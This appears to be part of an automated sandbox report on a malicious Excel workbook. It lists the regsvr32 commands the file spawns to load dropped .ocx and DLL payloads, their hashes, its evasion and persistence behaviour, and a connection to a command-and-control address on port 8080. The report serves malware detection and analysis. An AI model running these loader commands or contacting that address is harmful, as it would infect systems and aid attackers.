                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000529C7_2_000000018000529C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180008C9C7_2_0000000180008C9C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180020AA07_2_0000000180020AA0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800078A47_2_00000001800078A4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001F0A87_2_000000018001F0A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180022AAC7_2_0000000180022AAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001E4AC7_2_000000018001E4AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800048B07_2_00000001800048B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001ACB47_2_000000018001ACB4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180007EB47_2_0000000180007EB4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800162BC7_2_00000001800162BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800270C07_2_00000001800270C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800280C87_2_00000001800280C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001AEC87_2_000000018001AEC8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800050D47_2_00000001800050D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800234D87_2_00000001800234D8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001F6DC7_2_000000018001F6DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800026DC7_2_00000001800026DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180002ADC7_2_0000000180002ADC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018002ACE87_2_000000018002ACE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800150F07_2_00000001800150F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001E2F47_2_000000018001E2F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180016AF47_2_0000000180016AF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000DEF47_2_000000018000DEF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001DEFC7_2_000000018001DEFC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800125007_2_0000000180012500
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800063087_2_0000000180006308
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001370C7_2_000000018001370C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001A10C7_2_000000018001A10C
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF74DBD70 appears 113 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF753BD70 appears 113 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF74D7FF0 appears 31 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF9D2B3B0 appears 148 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF7537FF0 appears 31 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF9D27FF0 appears 31 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF74DB3B0 appears 148 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF753B3B0 appears 148 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF9D2BD70 appears 113 times
                      Source: melimar.com.xlsMacro extractor: Sheet name: PKEKPPGEKKPGE
                      Source: melimar.com.xlsMacro extractor: Sheet name: PKEKPPGEKKPGE
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\klJrMZJhgldiJr6j0XWPeZOiGs[1].dll 278D0C0BAF0203C13A5E72F31027F4FD0921F6FA2A84656485D86F8D09D562C0
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RD05UTHGkitvIJt[1].dll CAE8D1C14C85D10D7413AF876E6748813AD6930CF4D856E120857C4489A690DA
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\me435CErJsFGw1q[1].dll 90498F1EE590DA28566434C15EFCFD98E829846F233387553EA655FC7559168D
                      Source: melimar.com.xlsVirustotal: Detection: 57%
                      Source: melimar.com.xlsMetadefender: Detection: 31%
                      Source: melimar.com.xlsReversingLabs: Detection: 51%
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr1.ocx
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\HtkzwckLMRsIno\zbbayGuUXRtRt.dll"
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr2.ocx
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\XcSShRaCEZoMkA\LaeOniCeFWEmCa.dll"
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr3.ocx
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\WFwVcxpK\qMgBgEIcUslg.dll"
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr4.ocx
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr1.ocxJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr2.ocxJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr3.ocxJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr4.ocxJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\HtkzwckLMRsIno\zbbayGuUXRtRt.dll"Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\XcSShRaCEZoMkA\LaeOniCeFWEmCa.dll"Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\WFwVcxpK\qMgBgEIcUslg.dll"Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr1.ocxJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR68B1.tmpJump to behavior
                      Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@16/16@5/5
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: melimar.com.xlsOLE indicator, Workbook stream: true
                      Source: melimar.com.xls.0.drOLE indicator, Workbook stream: true
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180006F2C CloseHandle,Process32FirstW,CreateToolhelp32Snapshot,Process32NextW,4_2_0000000180006F2C
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                      Source: melimar.com.xlsInitial sample: OLE indicators vbamacros = False
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000C892 push ebp; retf 3_2_000000018000C895
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000D095 push B3B8007Eh; iretd 3_2_000000018000D09A
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000D0F3 push ebp; iretd 3_2_000000018000D0F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180013551 push ebx; retf 3_2_0000000180013559
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000D15D push ebx; retn 0068h3_2_000000018000D15E
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000CDA8 push ebp; iretd 3_2_000000018000CDA9
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000CE36 push 458B0086h; iretd 3_2_000000018000CE3B
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180013551 push ebx; retf 4_2_0000000180013559
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000C892 push ebp; retf 5_2_000000018000C895
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000D095 push B3B8007Eh; iretd 5_2_000000018000D09A
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000D0F3 push ebp; iretd 5_2_000000018000D0F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180013551 push ebx; retf 5_2_0000000180013559
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000D15D push ebx; retn 0068h5_2_000000018000D15E
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000CDA8 push ebp; iretd 5_2_000000018000CDA9
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000CE36 push 458B0086h; iretd 5_2_000000018000CE3B
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180013551 push ebx; retf 7_2_0000000180013559
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000C892 push ebp; retf 8_2_000000018000C895
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000D095 push B3B8007Eh; iretd 8_2_000000018000D09A
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000D0F3 push ebp; iretd 8_2_000000018000D0F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180013551 push ebx; retf 8_2_0000000180013559
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000D15D push ebx; retn 0068h8_2_000000018000D15E
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000CDA8 push ebp; iretd 8_2_000000018000CDA9
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000CE36 push 458B0086h; iretd 8_2_000000018000CE3B
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180013551 push ebx; retf 9_2_0000000180013559
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D30CC0 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,3_2_000007FEF9D30CC0
                      Source: uxevr1.ocx.0.drStatic PE information: real checksum: 0x654f5 should be: 0x5bd5c
                      Source: uxevr3.ocx.0.drStatic PE information: real checksum: 0x654f5 should be: 0x5c302
                      Source: uxevr2.ocx.0.drStatic PE information: real checksum: 0x654f5 should be: 0x66558
                      Source: me435CErJsFGw1q[1].dll.0.drStatic PE information: real checksum: 0x654f5 should be: 0x66558
                      Source: klJrMZJhgldiJr6j0XWPeZOiGs[1].dll.0.drStatic PE information: real checksum: 0x654f5 should be: 0x5c302
                      Source: RD05UTHGkitvIJt[1].dll.0.drStatic PE information: real checksum: 0x654f5 should be: 0x5bd5c
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\HtkzwckLMRsIno\zbbayGuUXRtRt.dll"
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr1.ocxJump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\XcSShRaCEZoMkA\LaeOniCeFWEmCa.dll (copy)Jump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\WFwVcxpK\qMgBgEIcUslg.dll (copy)Jump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr3.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\klJrMZJhgldiJr6j0XWPeZOiGs[1].dllJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RD05UTHGkitvIJt[1].dllJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr2.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\me435CErJsFGw1q[1].dllJump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\HtkzwckLMRsIno\zbbayGuUXRtRt.dll (copy)Jump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\XcSShRaCEZoMkA\LaeOniCeFWEmCa.dll (copy)Jump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\WFwVcxpK\qMgBgEIcUslg.dll (copy)Jump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\HtkzwckLMRsIno\zbbayGuUXRtRt.dll (copy)Jump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr1.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr3.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr2.ocxJump to dropped file

                      Boot Survival

                      barindex
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr1.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr3.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr2.ocxJump to dropped file

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\HtkzwckLMRsIno\zbbayGuUXRtRt.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\XcSShRaCEZoMkA\LaeOniCeFWEmCa.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\WFwVcxpK\qMgBgEIcUslg.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\regsvr32.exe TID: 2284Thread sleep time: -300000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\regsvr32.exe TID: 1488Thread sleep time: -60000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\regsvr32.exe TID: 2648Thread sleep time: -60000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\regsvr32.exe TID: 2592Thread sleep time: -60000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\regsvr32.exe TID: 2228Thread sleep time: -180000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\regsvr32.exe TID: 500Thread sleep time: -60000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_3-16410
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\klJrMZJhgldiJr6j0XWPeZOiGs[1].dllJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RD05UTHGkitvIJt[1].dllJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\me435CErJsFGw1q[1].dllJump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeAPI coverage: 8.2 %
                      Source: C:\Windows\System32\regsvr32.exeAPI coverage: 8.2 %
                      Source: C:\Windows\System32\regsvr32.exeAPI coverage: 7.3 %
                      Source: C:\Windows\System32\regsvr32.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800248B0 FindFirstFileW,FindNextFileW,FindClose,4_2_00000001800248B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800248B0 FindFirstFileW,FindNextFileW,FindClose,7_2_00000001800248B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800248B0 FindFirstFileW,FindNextFileW,FindClose,9_2_00000001800248B0
                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end nodegraph_3-16412
                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end nodegraph_3-16517
                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end nodegraph_5-16481
                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end nodegraph_5-16668
                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D23280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_000007FEF9D23280
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D30215 _itow_s,_invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,_wcsftime_l,_invoke_watson_if_oneof,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_snwprintf_s,_invoke_watson_if_oneof,_invoke_watson_if_error,_invoke_watson_if_oneof,_invoke_watson_if_error,_unlock,GetFileType,WriteConsoleW,GetLastError,_invoke_watson_if_oneof,WriteFile,WriteFile,OutputDebugStringW,_itow_s,_invoke_watson_if_error,3_2_000007FEF9D30215
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D30CC0 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,3_2_000007FEF9D30CC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D23280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_000007FEF9D23280
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D2BE50 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_000007FEF9D2BE50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000007FEF7533280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_000007FEF7533280
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000007FEF753BE50 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_000007FEF753BE50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000007FEF74D3280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_000007FEF74D3280
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000007FEF74DBE50 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_000007FEF74DBE50

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 173.82.82.196 8080Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\HtkzwckLMRsIno\zbbayGuUXRtRt.dll"Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\XcSShRaCEZoMkA\LaeOniCeFWEmCa.dll"Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\WFwVcxpK\qMgBgEIcUslg.dll"Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D28900 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,3_2_000007FEF9D28900
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D28860 HeapCreate,GetVersion,HeapSetInformation,3_2_000007FEF9D28860

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 7.2.regsvr32.exe.1f00000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.regsvr32.exe.1f00000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.3c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.regsvr32.exe.2c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.regsvr32.exe.2c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.3c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.regsvr32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.regsvr32.exe.1c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.regsvr32.exe.2010000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.regsvr32.exe.2010000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.regsvr32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.regsvr32.exe.1f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.925945389.00000000003C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.936818785.0000000002010000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.1223804747.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1223146291.00000000001F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.936929041.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.943746358.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.1223136184.00000000001C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1223965620.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1223736851.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.943475793.00000000002C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1223393241.0000000001F00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
